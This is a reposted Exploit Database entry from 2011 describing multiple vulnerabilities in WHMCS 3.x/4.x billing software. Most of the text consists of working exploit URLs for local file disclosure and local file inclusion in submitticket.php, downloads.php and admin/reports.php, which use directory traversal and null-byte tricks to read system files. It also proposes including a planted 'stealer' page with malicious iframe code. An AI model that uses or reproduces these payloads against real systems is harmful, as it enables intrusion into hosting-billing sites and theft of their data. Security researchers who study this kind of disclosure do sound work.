WHMCompleteSolution 3.x/4.x – Multiple Vulnerabilities

• Exploit Database
• 114 阅读

• 作者： ZxH-Labs
  日期： 2011-11-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18088/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  $b0x#WHMCS ( WHMCompleteSolution )3.x / 4.xMultiple Vulnerability ! $b0x#ZxH-Labs $b0x#1st-NOV-11 $b0x#Www.Sec4ever.coM $b0x#WH-03 On Windows IIS 6.0   ======================================================== b0x@1337b0x:/b0x/Exploits/WebAPP# whoami ZxH-Labs | Www.Sec4ever.coM b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL   EXPL Type : Local File Disclosure   Files : Submitticket.php , Downloads.php   -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00   ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00     b0x@1337b0x:/b0x/Exploits/WebAPP# b0x@1337b0x:/b0x/Exploits/WebAPP#cat WH-03.bug   Bug TYPE : Local File Include Bug File : Reports.php   -I : reports.php?report=[LFI]%00 EX : admin/reports.php?report=../../../../../../../boot.ini%00 You Can Use This Bug When You Get Forbidden Access In Lux Symlink ! However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00 And Don't Forget To Use IFRAME With Evil Code'z =))     b0x@1337b0x:/b0x/Exploits/WebAPP# Logout ======================================================== $b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |TNT_HACKER | r1z | Tw1st3r | S4S Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN| Th3MMA | FreeMan(LY) | Ma3stro_DZ Mr.L4iv3And All Q8'z   ./b0x